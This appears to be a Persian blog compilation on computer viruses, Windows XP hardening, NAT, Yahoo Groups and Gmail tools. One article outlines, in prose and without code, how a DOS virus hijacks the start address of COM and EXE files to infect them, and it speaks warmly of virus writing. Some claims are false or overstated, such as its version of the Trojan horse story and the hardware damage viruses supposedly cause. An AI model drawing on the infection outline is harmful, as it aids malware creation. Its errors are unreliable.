ببخشید که این چند وقت برای شما عزیزان مطلبی ننوشتم

این وبلاگ دوباره شروع به کار کرده و این دفعه با دست پر اومدم

گاهی اوقات احساس می شود که برنامه های کامپیوتر درست اجرا نمی شود و یا سیستم بی دلیل دچار وقفه است . از بین دلایل مختلف این امر یکی وجود ویروس است که از نشانه های وجود آن در سیستم می توان به موارد زیر اشاره کرد :

1- انجماد بی دلیل
2- پر شدن بی دلیل RAM
3- روشن ماندن هارد در زمان استفاده نشدن
4- تغییر تاریخ فایل های اجرایی مهم و با پسوند COM و EXE
5- حضور فایل های بیگانه
6- از بین رفتن بخشهایی از برنامه های موجود در سیستم و گاهی کل آنها


طبقه بندی از ویروسها

1- خود ویروس که با پسوند های اجرایی و کاهاً حالت ضمیمه به غیر اجرایی ها به محض ورود مشغول انجام دستورات داده شده می گردد.
2- کرم ها که با پر کردن رم و ایجاد حفره در سیستم ایجاد اختلال می کنند.
3- اسب های تروا که معمولا در باکسهای برنامه به صورت نهفته وجود دارند و منتظر اجرا هستند و به همین علت به آنها اسب تروا میگویند.( حتما داستان جنگ اساطیری روم را شنیده اید که سربازان رومی با مخفی شدن در اسب تروا توانستند به داخل شهر یونانی ها وارد شوند و جنگ را به نفع خود تمام کنند.عملکرد این ویروس عیناً همانند همین اسب و سربازان است. بدین ترتیب که اسب باکس یا جعبه برنامه است و به جای سربازان ویروس مخفی شده است.)
4- بمبها
1-4 بمب منطقی : این بمب به عملکرد خاصی حساس است . مانند استارت ویندوز یا اجرای یک برنامه
2-4 بمب زمانی : همانطور که از نامش پیداست در زمان خاصی عمل می کند. مانند چرنویل که در سالروز واقعه چرنویل روسیه عمل میکند.
3-4 بمب خوشه ای : این بمب در یونیکس استفاده می شود که لازم به توضیح نمیبینم عملکرد آنرا تفضیل کنم

براي افراد بيشماري مهم است كه بدانند يك حادثه در چه مدتي اتفاق افتاده است.

سفينه فضايي چالنجر در كمتر از 73 ثانيه بعد از بلند شدن منفجر شد. در 6 دقيقه آتش سوزي سيرك هارتفورد باعث كشته شدن 150 نفر از مردم شد كه بيشتر آنها زنها و كودكان بودند. در كمتر از 2 ساعت و 40 دقيقه كشتي غرق نشدني تايتانيك پس از برخورد با كوهي از يخ در سرو صداي اقيانوس خاموش شد.

اين مقوله براي كامپيوتر و سيستم هاي كامپيوتري نيز اتفاق افتاده است حوادث ناگوار فراواني نيز براي شبكه هاي كامپيوتري و به خصوص اينترنت نيز رخ داده است. كرم Slammer يكي از اين دسته حوادث مي باشد كه در كمتر از 10 دقيقه رخ داده است. پخش شده كرم Nimda در سراسر جهان كمتر از يك ساعت و نيم طول كشيده است. كرم Witty تقريبا 45 دقيقه طول كشيد تا با فراغت كامل تمامي سيستم هايي كه قابليت آلوده شدن را داشتند ، آلوده كند.

نسخه دوم كرم CodeRed كه آهسته تر از نسخه قبلي خود سيستم ها را آلوده مي كرد در 14 ساعت 359000 سرور را آلوده كرد يعني 2000 سيستم در هر دقيقه !

حال اجازه بدهيد كه يك زمان جديد براي انتشار يك حادثه بد در سطح اينترنت بيان كنم : 20 دقيقه !

زمان زيادي نيست ! شما نمي توانيد بيشتر شهر ها را در كمتر از 20 دقيقه بپيماييد.

شما فكر مي كنيد كه چه تعدادي از سيستم هايي با ويندوز XP وجود دارند كه به اينترنت متصل مي باشند و هنوز آسيب پذيرند ؟



مشكل ! راه حل ؟

بر اساس گراف امنيتي SANS ميانگين آلوده شدن سيستم ها به وسيله كزمها و ويروس ها فقط 20 دقيقه بوده است. توجه داشته باشيد كه اين مقدار كمتر از نصف ميانگين سال قبل بوده است. البته بايد گفت كه اين ميانگين متغير بوده است و از يك ساعت در كريسمس 2004 تا 15 دقيقه در بهار همان سال تغيير داشته است.

طبق بررسي هاي SANS براي به روز كردن يك سيستم زمان 20 دقيقه بسيار كم مي باشد اگر شما يك كامپيوتر جديد بگيريد پس از نصب ويندوز بايد به اينترنت متصل شويد تا سيستم خود را به روز كنيد و اصلاحيه هاي مايكروسافت را نصب كنيد و سيستم خود را دوباره راه اندازي كنيد و دوباره اصلاحيه بعد را دريافت كنيد و دوباره سيستم را راه اندازي كنيد (تا بينهايت ! ) تازه در كنار آن يك آنتي ويروس به روز هم داشته باشيد . ( هر چند كه با تاسف بايد گفت كه بسياري از كاربران ( بله تعداد زيادي از كاربران !!) در مورد نصب اينگونه اصلاحيه ها كمترين اطلاعي ندارند)

راستي فراموش كردم كه بگويم بايد SP2 را نيز دريافت كنيد حدود 200 مگابايت !!

خب ! حالا اين سوال مطرح است كه چند در صد كاربران مي توانند در كمتر از 20 دقيقه تمامي اين كارها را انجام دهند؟

فراموش كنيد ! من و شما حقيقت را بهتر مي دانيم !

افراد وقتي سيستم خريداري مي كنند سريع كابل شبكه يا مودم را نصب مي كنند و به سايت هاي چت مي روند تا ساعت ها وقت خود را آنجا صرف كنند . ايميل دوست شان را مي خوانند و يا به دنبال يك برنامه و يا موسيقي جديد مي گردند ! اصلاحيه هاي مايكروسافت ؟! چي هست اصلا ؟! به روز كردن ويندوز ؟ ها ها ؟!! آخر براي چه نياز دارم كه از سيستم خود محافظت كنم ؟ بي خيال آقا !

و فقط 20 دقيقه طول مي كشد !

انستيتو SANS اقدام به انتشار يك PDF يك مگابايتي كرده است با عنوان ويندوز XP ، ادامه حيات از روز اول كه يك مقاله خوبي مي باشد و بايد از انستيتو SANS براي انتشار آن تشكر كرد. در اين مقاله بسيار ساده و مختصر بيان شده است كه قبل از استفاده از ويندوز XP چه كارهايي بايد انجام داد. اما هنوز مشكل اساسي اين مي باشد كه آيا پدر و مادر و دوستان من آن را مي خوانند ؟ البته بعد از ترجمه آن به فارسي چون دانشجويان و تحصيلكرده هاي ما هم حال ندارند آن را ترجمه كنند ! يك جزوه 13 صفحه اي مطمئن باشيد كه عكس هم دارد ! اما هنوز هم با ديده شك بدان نگاه مي كنند ! بخوانم يا نخوانم مساله اين است !

اما بهترين كاري كه مي توان در اين مدت انجام داد اين است كه كامپيوتر هاي جديد را با SP2 ارائه دهيم كه در آنها ديواره آتش به صورت پيش فرض اجرا شده باشد. دوستان زيادي هستند كه با من تماس مي گيرند و از كندي سيستم خود و تبليغات ناجوري كه در هنگام مشاهده صفحات سايتها براي آنها ارسال مي گردد ناله مي كنند اما وقتي به آنها گفته مي شود كه هر برنامه اي را از اينترنت دريافت نكنيد و هر ايميلي را باز نكنيد با بي تفاوتي مي گويند : بي خيال ! تازه از همه اينها گذشته SP2 فقط براي ويندوز XP مي باشد در صورتيكه 25 درصد سيستم ها هنوز ويندوز 98 دارند و بيش از 25 درصد سرورهاي دنيا هنوز از NT4.0 استفاده مي كنند!

براي داشتن يك اينترنت خوب خيلي خوشحال كننده است كه مايكروسافت با SP2 خود ديواره آتش را به صورت پيش فرض اجرا مي كند. اگر كاربران به خوبي آموزش نبينند و آشنايي لازم را با آنها نداشته باشند بايد آنها را مستلزم كرد كه از برنامه هاي سختگيرانه تري براي ارتباط با اينترنت استفاده كنند و همين باعث مي شود كه سيستم آنها به راحتي در دسترس ديگران قرار نگيرد.

چند نكته اي هم به نظرم مي رسد كه بهتر است شما به دوستان و آشنايان خود آنها را نيز گوشزد كنيد و به كساني كه هنوز از نسخه هاي قبلي XP استفاده مي كنند توصيه كنيد كه بعد از به روز رساني آن كارهاي زير را نيز انجام دهند :

1- ويندوز را طوري پيكربندي كنيد كه به صورت خودكار و بدون هيچ پرسشي به روز شود. براي اين كار مي توانيد مقاله زير را بخوانيد.

http://www.uic.edu/pharmacy/it/Tips/winupdat1.htm

2- يك ديواره آتش در سيستم خود نصب كنيد كه به صورت پيش فرض تمامي ترافيك شبكه را بلوكه كند مگر زماني كه شما اجازه آن را صادر كنيد.

3- يك آنتي ويروس را دريافت كرده و آن را نيز طوري پيكر بندي كنيد كه بدون هيچ پرسشي به روز شود.

4- يك حذف كننده Spyware را نيز در سيستم خود نصب كنيد كه بدون هيچ پرسشي سيستم شما را پويش كند و در صورت مشاهده هر Spyware آن را حذف كند و خودش به صورت خودكار به روز گردد.

5- مرورگر ويندوز خود را با مرورگر Mozila و يا Mozila Firefox جايگزين كنيد و ميانبر آبي رنك E را نيز از صفحه كامپيوتر خود براي هميشه پاك كنيد! مي توانيد اين مرورگر را از اينجا دريافت كنيد.

6- به جاي استفاده از Outlook از Mozilla Thunderbird استفاده كنيد.

وقتي تمامي اين كارها را انجام داديد تازه مي توانيد بگوييد كه ويندوز به روز شده است. من حساب كردم ، تمامي اين كارها حدود 20 دقيقه طول مي كشد . 20 دقيقه اي كه باعث مي شود در آينده شما زمان بيشتري را براي پاك كردن سيستم خود صرف نكنيد.

البته درست است كه شما بهتر مي بينيد كه به جاي اين همه كار ، Linux نصب كنيد ولي اين زماني بيشتر از 20 دقيقه مي گيرد. اين زمان 20 دقيقه اي باعث مي شود كه شما يك كامپيوتر امن تري داشته باشيد و همچنين يك اينترنت امن ! پس شروع كنيد !

قبل از اينكه نگاهي عميق به مقوله NAT داشته باشيم مي بايست بدانيم كه عملكرد NAT چگونه است. بسته به نوع استفاده ، NAT روشهاي پياده سازي مختلفي دارد ولي همه آنها داراي يك مفهوم مي باشند.



NAT بسيار متداول شده تا آنجايي كه در قابليت پشتيباني از آن در اكثر دستگاه ها نظير router, firewall و... قرارداده شده است ويا حداقل يك نوع از اين تكنولوژي را پشتيباني مي كنند.



NAT تنها مختص شبكه هايي كه به اينترنت متصل هستند محدود نمي شوند ،بلكه شما از اين تكنولوژي مي توانيد بين شبكه هاي محلي خود نيز استفاده كنيد ولي چون اكثر سازمانها درجهت ارتباط با اينترنت از اين روش استفاده مي كنند ما نيز به بررسي همين نوع استفاده مي پردازيم.



مفهوم NAT بسيار ساده و به اين صورت است كه يك دستگاه (مثل كامپيوتر يا مسيرياب)به عنوان دروازه ورود به اينترنت عمل مي كند و با اين كار آدرس هاي ايستگاه هاي كاري را به آدرس دستگاهي كه NAT روي آن فعال است ترجمه مي كند ،به بيان ديگر NAT روي دستگاهي كه به اينترنت وصل شده فعال مي شود و ايستگاه هاي كاري و به طور كلي شبكه شما را از ديد اينترنت پنهان مي دارد.



از سوي ديگر اينترنت شبكه شما را به صورت يك دستگاه ساده مي بيند كه به اينترنت متصل مي باشد.



NAT روي شبكه تغيير ايجاد نمي كند و نيازي به تنظيمات دوباره روي ايستگاه هاي كاري نيست فقط ايستگاه هاي كاري مي بايست آدرس دروازه خروجي از شبكه را كه همان آدرس دستگاهي است كه NAT روي آن فعال شده را بدانند.

http://www.sgnec.net/admin/images/arts/nat1.gif

همانطوري كه در شكل بالا ديده مي شود شبكه با چهار ايستگاه كاري و يك مسيرياب جهت اتصال به اينترنت داريم .تمام ايستگاه هاي كاري داراي آدرس محلي گروه C مي باشند.

http://www.sgnec.net/admin/images/arts/nat2.gif

مفهوم NAT در شكل بالا به سادگي قابل فهم است.



NAT چگونه كار مي كند ؟

سه روش كلي براي اجراي NAT وجود دارد اگر چه قاعده كلي براي هر روش يكي است .همانطوري كه در شكل هاي بالا نشان داده شد ،ترافيك ارسالي از سمت ايستگاه هاي كاري از درون يك روتر به اينترنت وارد مي شوند و عمليات NAT را روي بسته ها انجام مي دهد و به مقصد مي فرستد.

هربسته اي كه روي كارت شبكه محلي مسيرياب دريافت مي شود توسط روتر عمليات جابجايي آدرس محلي با آدرس اينترنتي انجام مي شود و سپس بسته ها ارسال مي شود.


http://www.sgnec.net/admin/images/arts/nat3.gif

در اين شكل يك ايستگاه كاري از داخل شبكه يك بسته اطلاعاتي را به آدرس مقصد 135.250.24.10 مي فرستد ، اين بسته اطلاعاتي از داخل دروازه خروجي گذشته وبه اينترنت مي رسد.

عمليات NAT روي بسته ارسالي به روش زير ارسال مي گردد :

بسته اطلاعاتي اصلي پس از رسيدن به مسيرياب آدرس مبداء آن از 192.168.0.12 به 203.31.220.134 تغيير پيدا مي كند سپس روتر اين اطلاعات را در حافظه خود و در NAT-Table نگهداري مي كند و به اين طريق است كه بسته هايي هم كه از اينترنت ارسال مي شوند ،مقصد خود را تشخيص مي دهند.

آيا شما از آن دسته افرادي هستيد كه سالهاست از دوستان خود خبر نداريد؟ آخرين باري كه از نزديك ترين دوستاتتان خبري گرفته ايد چه زماني بوده است؟
مشكلات متعدد در عصر كنوني باعث محدود شدن روابط انساني گرديده است. شما با ايجاد يك گروه خبري در سايت Yahoo! به سادگي مي توانيد با دوستان و آشنايان خود تجديد ديدار نمائيد. براي ايجاد يك گروه خبري در سايت Yahoo! آدرس http://www.Yahoo.com را در نوار آدرس مرورگر خود وارد كرده و كليد Enter را در صفحه فشار دهيد.
در قسمت بالاي صفحه Yahoo! به روي گزينه Groups كليك كنيد تا به صفحه بعدي برويد و در صفحه وب باز شده به روي گزينه Start a new Group كليك نمائيد. در قسمت Yahoo ID ، ID و در قسمت Password كلمه ثبت شده در سايت Yahoo! را وارد كرده و بر روي كليد Sign In كليك نمائيد.
در پنجره باز شده شما با كليك نمودن گزينه Browse Group Categories نوع فعاليت و موضوع گروه را از صفحات آتي انتخاب نمائيد. از صفحات ظاهر شده شما مي توانيد نوع فعاليت گروه را هم به صورت دقيق و هم به صورت كلي انتخاب نمائيد.

نام نويسي
بعداز انتخاب نوع دقيق فعاليت به صفحه نام نويسي وارد مي گرديد. در اين صفحه شما بايد در قسمت Group Name نامي را براي گروه خود و در قسمت Enter your Group email address آدرس گروه خبري خود را وارد كنيد. در قسمت Describe your Group توصيفي از اهم فعاليتهاي گروه را در كادر مربوطه وارد نمائيد. براي ادامه ثبت نام بر روي كليد Continue كليك كنيد.
در ادامه نام نويسي در قسمت Email Address مي توانيد يك آدرس را براي دريافت Email وارد نمائيد و در قسمت Email Profile مقداري در مورد خصوصيات فردي خود بنويسيد.
در قسمت Word Verfication كلمه ظاهر شده در قسمت شطرنجي را عيناً وارد كرده و بر روي كليد Continue كليك كنيد. در صفحه بعدي به شما به خاطر ساخت گروه مورد نظرتان تبريك گفته مي شود.

وارد كردن اسامي دوستانتان در گروه خبري
براي وارد كردن اسامي دوستانتان به گروه خبري بر روي كليد Invit People كليك كرده و در صفحه Invite Members ، در قسمت Enter email addresses آدرس E-mail افرادي كه مي خواهيد به گروه خود دعوت نمائيد را وارد نمائيد. در همين صفحه در قسمت Enter an Interodutory message پيام دعوت خود را وارد كرده و بر روي كليد Submit Lnvite كليك كرده و در صفحه باز شده بر روي كليد Go to Group كليك كنيد تا به گروه وارد گرديد.

اعمال كنترل بر نحوه عملكرد گروه خبري
شما به سادگي مي توانيد به نحوه عملكرد گروه خبري اعمال كنترل نمائيد. براي اين منظور كافي است به گروه خبري مورد نظرتان وارد گشته و در نوار سمت چپ صفحه بر روي گزينه Management كليك كنيد. در صفحه ظاهر شده شما به صورت وسيع مي توانيد بر نحوه عملكرد گروه خبري اعمال كنترل نمائيد. اين اعمال كنترل از امكان استفاده و اضافه نمودن ديگران به گروه خبري تا نحوه عملكرد كلي گروه خبري قابل تنظيم است.

چكيده
امروزه با توجه به فراواني ويروس هاي كامپيوتري از يك طرف و صدمات حاصل از انتشار آنها از سويي ديگر شناخت و نحوه مبارزه با آنها بسيار حائز اهميت مي باشد . در اين مقاله آشنايي با نحوه عملكرد ويروسهاي كامپيوتري بيان شده است .

مقدمه
امروزه با توجه به تعدد ويروس هاي كامپيوتري در كشور،كه اغلب آنها نيز ايراني مي باشند، شناخت و جلوگيري از تخريب آنها مفيد ولازم به نظر مي رسد . پيش از هر گونه بحث فني لازم است توضيحي در مورد ويروس و خوب وبد بودن ويروس سازي از ديدگاه مثبت آن بررسي شود تا مبادا افراد بد گمان و احتمالا متنفر از ويروس ، سيل بدو بيراه خود را نثار ويروس نويسان! كنند بد نيست بدانيم جداي از هنر و تكنيك زيباي عملكرد ويروس هاي مختلف و شيريني جدال با ويروس يابها ، خود ويروس عاملي براي حمايت از برنامه هاي كاربردي مي توامند به شمار آيد، چرا كه اولين ويروس ها در راه جلوگيري از كپي برداريهاي غير مجاز طرح و نوشته شده و زمان فعاليت آن را موكول به وقتي كرده اند كه فرد خاطي از " خواهش عدم كپي غير مجاز" نياز به گوش مالي دارد ! تا شايد همين فرد عادت به خريد و تهيه ي برنامه هاي مورد استفاده خود از طريق اصولي بنمايد.
واما ويروس ها برنامه هايي هستند كه به شكل پنهاني، موقع اجرا شدن برنامه آلوده خود را به برنامه هاي اجرايي نظير فايل هاي COM و EXE مي چسبانند و معمولا بدون اينكه تاثيري در كار اصلي برنامه آلوده بگذارند، منتظر زمان فعاليت نهايي يا برقراري شرط خاصي مي شوند . حال اين فعاليت مي تواند بزرگتر كردن فايلهاي مختلف DATA باشد ، يا آلوده كردن فايلهاي اجرايي و يا از بين بردن اطلاعات PARTITION TABLE، معدوم كردن اطلاعا ت با ارزش يا از كار انداختن فايل هاي اجرايي و ... باشد .
ولي در هر حال يك چيز در اكثر ويروس ها مشترك مي باشد و آن انتقال ويروس از فايل هاي آلوده به فايل هاي سالم است . در اين مقاله سعي شده است كه نحوه عملكرد يكي از انواع ويروس هاي كامپيوتري بيان شود كه قبل از مطالعه لازم است به نكته ذيل توجه گردد.
افرادي كه مايل به مطالعه مقاله مي باشند لازم است كه :
1- با زبان اسمبلي آشنا باشند .
2- به DEBUG و دستورات آن مسلط باشند .
3- از اطلاعات برنامه نويسي سيستم در حد آشنايي با Header فايل هاي اجرايي برخوردار باشند .
بنابراين اگر ملاحظه مي شود كه روشها بسيار خلاصه مطرح شده، تنها بدليل عدم دسترسي عمومي به اطلاعاتي كه ممكن است خطرناك باشد،است و هدف، ارائه روش بوده و باقي جزئيات بر حسب توان با خود برنامه نويس است .


(توضيح اينكه ويروس ها برنامه كامپيوتري هستند و نه چيز ديگري و مي توانند با انواع زبان هاي برنامه سازي Assenbly، C++، Pascal،Basic، ... طراحي شوند و ما از قويترين زبان يعني اسمبلي جهت اينكاراستفاده كرده ايم .)

قبل از بيان الگوريتم كلي ويروس نويسي بهتر است به توضيح يكسري عناوين زير بپردازيم :


انواع دستكاري و تخريب ويروس هاي كامپيوتري
صرف نظر از ويروس هايي كه كاربران را مورد لطف قرارداده و تنها با صدورپيامي، نمايش تصويري و يا پخش موزيكي حضور خود را اعلام مي كنند،ساير ويروس ها به گونه هاي مختلف باعث نابودي اطلاعات و در برخي موارد باعث خرابي سخت افزار كامپيوتر مي شوند. در زير نمونه هايي از خسارات ويروس ها بيان مي شود:

الف: اختلال در كار سيستم(تخريب نرم افزاري)
در اين حالت ويروس با ايجاد خطا دربرنامه موجب اختلال در اجراي آن مي شود. اين اختلال گاه همراه با تصويري بر روي صفحه نمايش و يا صداي خاصي بلندگو يا قفل شدن كامپيوتر مي باشد .

بعضي از دلايل اختلال در سيستم بدليل ويروس ها عبارتند از:

1-خطاهاي برنامه نويسي توسط برنامه نويس ويروس
2 - ناسازگاري ويروس با سيستم يا نرم افزارهاي نصب شده بر روي آن
3- تخريب اطلاعات كه شامل حذف، تغيير ويا اشغال و تكثير در حافظه
4- اختلال عمدي سيستم توسط ويروس(اهداف نويسندگان ويروس) كه به عنوان مثال مي توان به كندي سرعت سيستم اشاره كرد.

ب:تخريب سخت افزراي
عده اي معتقدند كه ويروس ها نمي توانند به سخت افزار آسيب برسانند وتا به امروز، هيچ ويروسي پيدا نشده است كه كه اين كار را انجام دهد. ولي در خلاف انتظار از بين بردن سخت افزار توسط برنامه هاي نرم افزاري امكان پذير و عملي است . گرچه خسارات سخت افزاري در موارد اندكي توسط ويروسها وجود دارد ولي بايد آنها را جدي گرفت . به عنوان مثال كامپيوترهاي سري آميگا از شركت كمو دور، به خاطر نداشتن كنترل در قسمت هاي مختلف در مقابل ويروس آسيب پذيرند.
در اين كامپيوتر ها مي توان به كمك نرم افزار ،موتور ديسك گردان را از حركت باز داشت و همزمان فرمان خواندن يك تراك كه وجو ندارد ، را به هد داد به اين ترتيب هد به ديواره هاي ديسك گردان برخورد كرده و مي شكند . نمونه ديگر اين است كه CPU و Icهاي آميگا از جمله اگنس ، دنيس و پائولا از نوع CMOS بوده و در مقابل الكتريسيته حساس هستند . اگر همزمان به تمام وروديهاي بيت يك اعمال مي شود ولتاژ اضافي باعث خرابي ICها مي شود.به كمك يك برنامه كوتاه چند خطي به زبان ماشين مي توان كليه ثباتهايي كه به نام CPU مي روند را حاوي بيت يك نمود و CPU را خراب كرد .
در رايانه هاي شخصي ويروس مي تواند هد خواندن و نوشتن ديسك گردان را روي يك تراك داخلي ، كه وجودندارد قرار بدهد. در بعضي از ديسك گردانها، اينكار باعث مي شود كه هد ، به بستي در داخل ديسك گردان گيركندو فقط با باز كردن ديسك گردان و جابه جا كردن هد با دست ، مشكل حل مي شود.
ويروس مي تواند تراك صفر ديسك را نابود كند در اينصورت ، اين ديسك ديگر قابل استفاده نيست يا اينكه ويروس بطور مكرر هد از سيلندر بيروني به سيلندر داخلي حركت دهد اين امر سبب سايش ونهايتا خرابي ديسك خواهد شد . در اينجا ممكن است مستقيما چيزي تخريب نشود ولي باعث فرسودگي مي شود. براي مثال ويروس AMP2P كه روي فايل CAMMAND.COM ويندوز 95 وجود دارد ،قادر است تنظيم اصلي كارخانه را تغيير دهد و ويروسي كه بتواند اينكار را انجام دهد قادر است به تمام اجزاي سيستم دسترسي داشته و آنها را خراب كند . اين ويروس معمولا هارد ديسك را دچار تعدادي بد سكتور مي كند ويا تراك صفر را از كار مي اندازد كه با فرمت فيزيكي مجدد نيز ديسك قابل اصلاح نيست .
تا چندي قبل ويروس ها فقط فايل ها را خراب مي كردند كه معمولا چاره اينكار آسان بود ولي اكنون ويروس ها به آنچنان توانايي رسيده اند كه قادرند سخت افزار سيستم را مورد هدف قرار دهند كه در اين صورت خسارات ايجاد شده شديد و جبران آن سنگين است . تازه ممكن است پس ازتعويض قسمت خراب شده ، ويروس مجددا آنرا تخريب كند.


ساختار كلي فايل هاي COM وEXE تحت DOS

ساختار كلي فايل هاي اجرايي از نوع COM تحت DOS

با توجه به شكل ، مشخص مي شود كه معمولا و نه هميشه اولين دستور از فايل هاي اجرايي COM، حاوي يك آدرس پرش (Jump) مي باشد كه اجراي برنامه را به مكان ديگري از داخل حافظه انتقال مي دهد و سپس دستورات اصلي برنامهاز مكان XXXXX در شكل فوق آغاز مي گردد.اما اگر همين آدرس پرش اوليه را بتوانيم طوري تغيير دهيم كه به ابتداي برنامه خودمان منتقل شود .مي توان گفت كه نصف كار آلوده سازي را انجام داده ايم . بصورت كلي جهت انجام اين كار ابتدا آدرس پرش اوليه XXXXX را در مكاني از حافظه ذخيره كرده (براي استفاده بعدي ) و سپس آدرس شروع برنامه خود را درآن قرار مي دهيم . خوب تا اينجا توانسته ايم كنترل اجرايي فايل هاي COM را بدست گيريم . سپس كافي است در داخل ويروس عمليات مربوط به يافتن فايل هاي اجرايي غير آلوده ، درستكاري آنها و انجام يكسري تخريب ها ( چاپ يكسري مطالب جهت ترساندن كاربر معرفي خود) و نهايتا برگشت به آدرس اوليه پرش XXXXX جهت اجراي عادي فايل آلوده شده مراجعه كرده تا برنامه ازاين پس روال عادي اجرايي خود را انجام دهد.


ساختار كلي فايل هاي اجرايي از نوع EXE تحت DOS

ساختار كلي فايل هاي EXE پيچيده تر است . طبق شكل،تمام فايل هاي EXE داراي يك Header يا عنوان بوده كه شامل اطلاعات تخصصي فايل اجرايي نظير مشخصه فايل،اندازه واقعي فايل،آدرس هاي Data Segment،Code Segment و..... مي باشد. بنابراين بر خلاف فايل هاي COM كه اولين دستور از آنها حاوي آدرس شروع برنامه است ، در اين فايل ها بايت هاي 20و22 در داخل Header حاوي آدرس شروع برنامه است و چون فايل هاي EXE از نظر اندازه مي توانند خيلي بزرگتر از COM باشند، اين آدرسها شامل SEGMENT:OFFSET است
با توجه به توضيح فوق در مورد نحوه آلوده سازي فايل هاي COM كافي است آدرس هاي X1:X2 را به ابتداي برنامه خود تغيير داده وسپس در پايان كار نيز به محل اوليه X1:X2 باز گرديم . اما اين نكته قابل ذكر است كه بدليل پيچيدگي ساختار فايل هاي EXE، آلوده سازي اينگونه فايل ها از فايل هاي COM مسكلتر است .


دلايل خراب شدن فايل هاي اجرايي
همانطور كه توضيح داده شد، به هنگام آلوده سازي فايل هاي اجرايي ممكن است، در محاسبه تغيير آدرس ها اشتباهاتي صورت گيرد و يا يك فايل اجرايي چندين بار آلوده گرددو در جريان چنين اعمالي نيز امكان دارد سيستم روال اجرايي عادي خود را ازدست داده و داخل يك حلقه بي نهايت قرار گيرد و يا به مكاني از حافظه پرش كند كه هيچگونه دستور العملي وجودنداردو سرانجام باعث HANG كردن يا قفل كردن كامپيوتر مي شود كه گاهي اوقات بعضي از ويروس ها به هنگام آلوده سازي دچار اين مشكل شده و احتمالا با اين مسئله برخورد كرده ايد كه به هنگام آلوده بودن كامپيوترتان سيستم بدليل نامشخصي قفل مي كند.

باتوجه به توضيحات داده شده،هم اكنون الگوريتم كلي يكي از انواع ويروس هاي كامپيوتري را به صورت زير مي نويسيم :

1- اولين فايل اجرايي در مسير جاري را پيدا كنيد
2- گر فايل پيدا شده ، آلوده است و ديگر فايل آلوده ديگري جهت جستجو وجود ندارد به مرحله 6برويد
3- اگر فايل پيدا شده آلوده است به مرحله 1برويد
4- فايل آلوده شده را پيدا كنيد و فايل را طوري تغيير بدهيد تا به صورت عادي كار كند(آسيب نبينيد)
5- به مرحله 7برويد
6- عمليات مربوط به دستكاري يا تخريب را انجام دهيد
7- برنامه اوليه را اجرا كنيد

نتيجه گيري
با توجه به اينكه اغلب ويروس ها جهت آلوده سازي كامپيوتر ، طبق توضيحات داده شده، فايل هاي اجرايي حمله ور مي شوند و آدرس هاي داخل فايل را تغيير مي دهند، پس چه بهتر است بتوانيم اين مكان ها را هر چه دقيقتر كنترل كنيم و همچنين با شناخت هر چه بيشتر كار ويروس ها، آمادگي كاملتري جهت مبارزه با آنها كسب نماييم .

با تحولي كه جي‌ميل به عنوان سرويس پست الكترونيك رايگان گوگل به وجود آورد، برنامه‌نويسان را بر آن داشت كه ابزاري الحاقي براي استفاده آسان‌تر از آن پديد آورند. در اين‌جا تعدادي از اين ابزار را از منابع گوناگون گرد هم آورده‌ايم تا فهرست تقريبا كاملي از آن‌ها را داشته باشيد:
Official Gmail Notifier from Google (نسخه بتا) - اين برنامه كه از طريق سايت گوگل قابل دانلود است، يك برنامه الحاقي براي ويندوز است كه به كاربران امكان مي‌دهد تا وضعيت صندوق پستي خود را به صورت آنلاين در تسك‌بار خود مشاهده نمايند. اين برنامه ورود هر نامه را به صورت آنلاين به كاربر هشدار مي‌دهد.
Gmail Search Extension - اگر مايل هستيد كه جستجوي داخل صندوق پستي خود را از نوارابزار مرورگر موزيلا يا فايرفاكس خود انجام دهيد، از اين برنامه استفاده نماييد.

Gmail Tray - جستجو در صندوق پستي از طريق تسك‌بار.
Gmail Notifier - برنامه الحاقي فايرفكس كه وضعيت آنلاين صندوق پستي را در نوار ابزار مرورگر فايرفاكس نشان مي‌دهد.

G-mailto - با استفاده از اين ابزار، در هر صفحه‌اي كه لينك به جي‌ميل باشد، در هنگام كليك صفحه compose جي‌ميل باز خواهد شد.
Gmail-to Bookmarklet - ارسال ايميل به وسيله جي‌ميل در هر صفحه. كاري شبيه به آنچه كه BlogThis! button در بلاگر انجام مي‌دهد.
Gmailit - ارسال صفحه جاري به هر كسي كه جي‌ميل دارد.
GMail Loader (GML) - براي فوروارد ايميل‌هاي شما به جي‌ميل.
Pop Goes the GMail - مبدل جي‌ميل به POP3.
gExodus - يك ابزار رابط گرافيكي كه امكان وارد كردن ايميل‌هاي شما را به جي‌ميل مي‌دهد.
gCount - يك نوار منو براي سيستم‌عامل Mac OS X 10.3 و نسخه‌هاي بالاتر كه تعداد ايميل‌هاي خوانده‌نشده صندوق پستي را نشان مي‌دهد.
GMail, RSS Feeds - اطلاع از ايميل‌هاي جديد با استفاده از RSS.
Gmail as o­nline backup system - با استفاده از اين اسكريپت PHP، از فضاي جي‌ميل براي دخيره و بازيابي فايل‌ها استفاده مي‌كنيد.
Gmail in Opera - استفاده از جي‌ميل در مرورگر اپرا كه هم‌كنون توسط جي‌ميل پشتيباني نمي‌شود.
Gmail Gems - ترفند‌ها و نكاتي براي استفاده بهينه از جي‌ميل.
Unread Gmail - ايجاد يك برچسب با عنوان Unread به ظوريكه جي‌ميل تمام ايميل‌هاي نخوانده را به آن برچسب هدايت كند.
PINE Addressbook to Gmail - خروجي addressbook در فرمت CSV از PINE به جي‌ميل.
GmailFS - Gmail Filesystem - برنامه‌اي كه با استفاده از پيتون نوشته شده تا از فضاي يك گيگابايتي جي‌ميل بتوان مانند يك درايو استفاده كرد.
GSuite - يك مرورگر كوچك كه كار با جي‌ميل را براي كاربران بسيار ساده مي‌كند.
GmailStatus - يك برنامه مفيد ديگر براي اطلاع از تعداد ايميل‌هاي نخوانده صندوق پستي شما اما براي نوار منوي سيستم‌عامل Mac OSX.
gmail copy - ابزاري كه با ايجاد يك خط فرمان امكان كپي كردن فايل از و به جي‌ميل را مي‌دهد.
GMailer (libgmailer) - يك كلاس PHP كه به شما كمك مي‌كند تا اعمال دسترسي، چك‌كردن و استفاده از جي‌ميل را از طريق اسكريپت‌هاي PHP مي‌دهد. Gallina از همين روش براي ايجاد وبلاگ استفاده مي‌كند.
gNotify - يك ابزار ديگر براي آگاهي از وضعيت صندوق پستي شما.
gPopper - برنامه‌اي براي ارتباط جي‌ميل به POP3
Gmail Agent API - يك برنامه كدباز براي آگاهي از وضعيت صندوق پستي و ايمپورت آدرس‌بوك.
MINCUS - دسترسي به جي‌ميل از طريق ي: رابط.
Outport - گرفتن خروجي از Outlook براي وارد كردن در جي‌ميل.
GTray - اطلاع از وضعيت صندوق پستي حتي در صفحه ورودي ويندوز.
